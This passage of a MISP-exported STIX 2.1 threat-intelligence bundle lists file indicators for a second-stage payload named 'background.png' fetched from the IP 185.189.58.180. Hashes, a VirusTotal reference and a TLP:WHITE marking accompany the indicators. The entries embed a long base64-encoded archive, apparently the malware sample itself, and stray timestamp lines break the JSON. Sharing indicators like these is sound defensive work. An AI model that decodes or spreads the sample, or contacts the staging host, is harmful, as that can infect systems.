o8Rq8MDKumuCg+3GwtQKBceANooq/BpkK7zsuaUGxnSjZQ0DeGuMm1c3rzAk6zN/E77vNnAK/XijIKV6z7J+8HNYVKAk9QO2n2bwOK66fZfDHqszGdfnVW1H+8nsaKHujaeldaHGVJBDcwXDXil3ECcQZ9sUJK76RArV76DBn3KaIndv7v38uV6UNQwt/5tmBvpM36yKBv+qPsndzmVsI69yNaMx5OqvqY3msSF0jVXMWEtPKfhX3hCNoVRQyyP6ectR7dsG3/Ki5Wa84q+aN/eKKaSgOcH5vkuZj26UhOKebTYZ9EBH20akXjVUKMtkkxGfyXnDGg46ZFNYM+JhhMLyBmUH2Uh1l2xlNK0QiJU/90ga88OsMQUkBlui1n03qEsfiQkN26c4qCKUGWWx6pSi/IB52XfC7ZIDW9kNXYOmbbFWTTjUyiGtQ0Q33HpgSgY/0PaXxDrGxx/vXOV92z5rJimpl0V9IUrd5XVdeJq6097evacnUhEeB2eMfbZNp1TH4XRPBhJosvVbe8KZlVpBjHfuIJADr0PmWbVPeQzxge6I14Wt5a/ZdTANKWxBuubFq9hlGQA/fTlvAquzeu7jPyq1spnOBr6ed5ru4n
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T07:02:26Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07b547-3fd4-451f-b654-4fec950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T10:21:34.000Z",
"modified": "2018-05-25T10:21:34.000Z",
"description": "2nd stage from 185.189.58.180",
"pattern": "[file:hashes.MD5 = 'e766226346f8d0b097ac7c87edbf605a' AND file:hashes.SHA1 = 'c1d3cd8769a71dd0e379c9727ec8443a29c963c5' AND file:hashes.SHA256 = '89aede2f30334329388acb0864a9c9e45d209af4be47d1818fc4e23acdb5cddd' AND file:name = 'background.png' AND file:size = '53575' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAHI4uUw5YyfNWpsAAEfRAAAgABwAZTc2NjIyNjM0NmY4ZDBiMDk3YWM3Yzg3ZWRiZjYwNWFVVAkAA0e1B1tHtQdbdXgLAAEEIQAAAAQhAAAAZRGrzqGM/hnZPnoNYAiXMto/EUuES4svAZJBelywUZQlwAvhV7ikJkVn5+xCNei0tKps9pc79vcfdOmwoqMspelOEQbRsxhubT/XxP/Ck7W2w7oANd6+zv6mtMRnZpv/branfiN7PNQ+Zh7EIFCEaW2CV0QUga3ynD6KVtVErgSBF0Eo323m2nllC9RCbXk5aDLXR/c7bj6GhansFEY+uNzbth6ostO7xibz+SW26ec/MVJkI6Ew3i0GA9nEv6ziqDsBnjlZgIw0PLbbka+4i2ip1KM1RlMHfi8CJjUimMaG2ChyXY17zD/m3VT1fvBqKIWiVjFtOCWYzJPXi4tR6HqVZg9BqSa0TytY+9eY5VQ18g/5XThawv99t8aP7Ae4E4muprUQ0bF4bn7VULp7rLwKO7XXJ67YyIvpL0llo9GdmLtSIGKlNe+d51txa1V2rU/A6TJOu8Ra4hWO5fg8AFAMW9WVx8HiqYCtKIr5I33s3IuoLTDLZ9ljhiQBfx8jUaVrYcet7qO4Rq4TDCoQxa4qx+614/EJk7GNWMDPyiyyz2nGOaRvixwv4621xw1PxykWHYa9EVn48DYxpk1I0NfEZKGwMxL4mYa8hELf8lD3T2OoZavV+BiiVmSt7KfprV0UgKjNzAxJsNlJYZdLm1tBWrJxAVeyY+2CkWvr5uKbsh8hBoLIzW+3OUMQ1Hnm8gUV7wnwVP8Ri0JfsYoW6qiMzCcVobGTpy4AclhYzg4IEAdlm48RtEV0W6qJEBos5Sye15NM70IRdqVdn65Zzj9YG0U98e1DTuahAVWEZRK1Ea2hqgYdYZos3fd0tGwTJQRrFojyG/J1ibmnrqLr0MWzghHvzP4BLy7kevI5x3E2oYoAngr+osue85y2BT2hEedBceqBn5onCfQ9AXEpIzZmW/0bxBovAp9nlK4CPYRhPfoK1+2pzg++YXfluVlV6wBXSLlkNqO867tUSnVUXhg0QZPxW9UFrkWzgYTKBXKLY+YOGZWzuY7hknQQqWess6uiVclHDaWPuhTBbRwzWpyXPZSAvCFIvVjYcpDnNYiey+4O/s4JjyxMPSx71Iv4rtAphitC9pJ13PlbWKaxHKurVYWyaDuVDM+thTfeWaIQAHX4QKuczY0KupNfgDD0J+xLT77OP3Qc5MJpWBxqsvRC9LIU4nk+4Ui0Wv//pWBErrkr+ppg8i96YOUYW9pTS1lRR/iqv/kRwWOLS+rdFg/qYk8qHGS72etrlQqct2WIsmpmM6VUX01bfdtRu8meXLPhiYKj4r+D84wveGv2e8V3Y8JtxYCOmHk07lprsW4l1Fp/NI9Zd+plVF/IuWJaWX+61duPJOmrOZQ/0stETZIg+EDI0RDez93BUM0nASxB1YlPsdRmnVfN+yB+fibpwRJ4U480eHU/GGojQ7kz2lVnCAYVNAopU7/9N8ofA8JSQdvARMA5Cyf0VfzH1b0/sZeJOQ5iNH/eRnoqWsG9rmTlnyp8XwdCXqOMpYinC1dmwsUEkJWw47qGwqlkO4I/ElbLRZWotujnFtvNB+V34nZYt2D9svwp+KJJ7lVn4ryQHEHswh0rAtvV45eHNrJgZbfnIYj9aeXCpuc7rhe/dyoLvhVErD83OEpkdJGqWAIuoPf0cFXGP4Fi8MXCFeOaeIAtfKo1s6XCWQr4MIWae4eInvzBH9lIqAivot0/ldcQplmHq4D9DHUlKP6iXV+mDEg4EzAQfmtceix/uWLE1XhWu5D7675W7SML81BDI5YKNoI46FCYctZdPdNo9y0Bu+3dT4OfuTG/EJcLux4PmotbP1xdGTy/Nc4syKW0rQqBaGjqx2SXso/1BqbBUxGTX4+aV8HnqE9GO16sCBnAxwUX/rpwZjY42ZK8SwLnsMfqAPhEJfMh6u0T7lJTM6UIP6aSFfR+tz7U75KRhyD8xJoFAyO8pH4nW+StHBnEsPyKMIJr812XansQD234+B4RBmfmABbM9XnMUnOvcC0082ZDgqSVLuUULCUD54mcawJ5DLhZ2ynoIl67qUv43EV8x2f0VTpZW33SWfbU3XaczlqTQgotAG4CEbS1rMnLpBj0PZxa4o2AqNzLzMjCBXHpOhRB5uJZDSR/nzJq8Y8PUzNdeHcR9Gte3LwJ1TK/VutZ94FNtL0z8KddR0j5uPXibZHGVKz8BvNmgTQvwA1vPOVwEWDE9EWPyim87D3tkLUBTKygMlEm8qVwvOL7rnHA/H4+yozps89URuc49gMMp0bqOvaczyzqFTA2Iqx2E3iPS8VCtkieUhGKR2hIua6Dp6vOD1l7qftgU21OPC52vNE6HvQPGFngarQ4K0P7cUEjrW/g3STJPzbjVvdGcwzs+sdJmUPFxhL4IEs+9/XT1jdEezxRxrv2eDEUMf2rbQw/c/sQmWxjSBg9hZBzdezjzrqfRFaYRnTmfljzKi1vaI/zehyXIGVTHGGOUUvdmf/guJg1PeZ996rnpCvLBvwjUXLXe63ZoTTCRmYel1RyGP61yF6yM/635t+uDVaNeJTTDwGkPn2pKVJvpBh/gXFwdO/MzX87xAw1trWdSWMwLOXgMjgFkYXN8tub4tFfB4W01N7bwmQOwfIxz1DEuszZOK0u79BT+I1UdplqNEhJ6cQ+2DCTFoQRRk7SFaqLnKfEovxuQsEm/JaEnhYafGTKTk9qsK4gT2Hz2kLhVQGxjKKPJAXCD7kavZZMVI6xdJoTj3JcfLRI5jWcI0khYQGAg9pIuxtMrnJow5PJfdmhDGzNhKKZSw+7cL96CTCtoCDcN1E11QV6uxW05jipY2ZnxpAELMtvCOKYUvQWQpRpTLIfZr4BZRlwyYt5Tq0CReaHTKubv44ybqrbxEimwTPwf5zZyMWVpVHT/r2y7+MDftW8dm72CFIopovZmP9fpGGlRlUhnz5FrclaHyygQloZAdTVEQXErtmF7tgGPznZkz5HxEgriAZMErrujVMPqb0bu0UwToQNqv4H4xPs0SPWXVOlD6u20PxOJmLqMYvcT+iEhMlKHoQ9S6uq/BAAgFBTRUddvYNK+e7o3+EEc13QfEwpbXAmwly2CNe5z7RvgPXv1ujsT8jLFP5oFfCU7oS27Kcz3Eokcy0TEzSdxoj90F/LfgXtNV9cA6ZNGIZDelSbm7FWzjLDpVal0sJkv09hToeiqf2jg7n1ugw0ZREO7abeYRyuageOCKokeFBM6MKRBm0E4uV372JiRo/hdbikexwkHYGUx87kopIRwhXceWfnGP5C0YXN+Q6cY/JTd821iR6PF57vXBd7+fcgHbUyLwCvP1Yom6snBvlf3ZG07O8RRPItAeFlek5PbCP0F+Gjl1fNPq4OkTeeFQnVPo6d3XgiCe05bLE6VMM41PA14MiGrV7TqsdFQD9lXkLKGG68ZyYEZEcIN/+QVyLe5ZOWHUikqGbXBOP13eOKNg4jNqcvc17LpZSwfzOHx2RjmJcRTZIDdGI9wWh4cF2MRP9ZvWDl8r7zokreg7p5dt9CnBdhRG2oCL3P50hPzZDZ5CRDVbk3A3aosMg9Ys4yfppQTfR7c6GLmVX9Pp36c+fJyK44d8zMHO1A4DaZ1iF51RpKcqlE9py8JLIGpRsWdLC5sZ/iZz1Jvybh+QVi0
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T10:21:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T10:21:31.000Z",
"modified": "2018-05-25T10:21:31.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "relationship",
"spec_version": "2.1",
2024-04-05 12:15:17 +00:00
"id": "relationship--b4bd940e-104e-4f1b-be46-c4ecb9a0da7f",
2023-04-21 14:44:17 +00:00
"created": "2018-05-25T10:21:32.000Z",
"modified": "2018-05-25T10:21:32.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--5b07b547-3fd4-451f-b654-4fec950d210f",
"target_ref": "x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}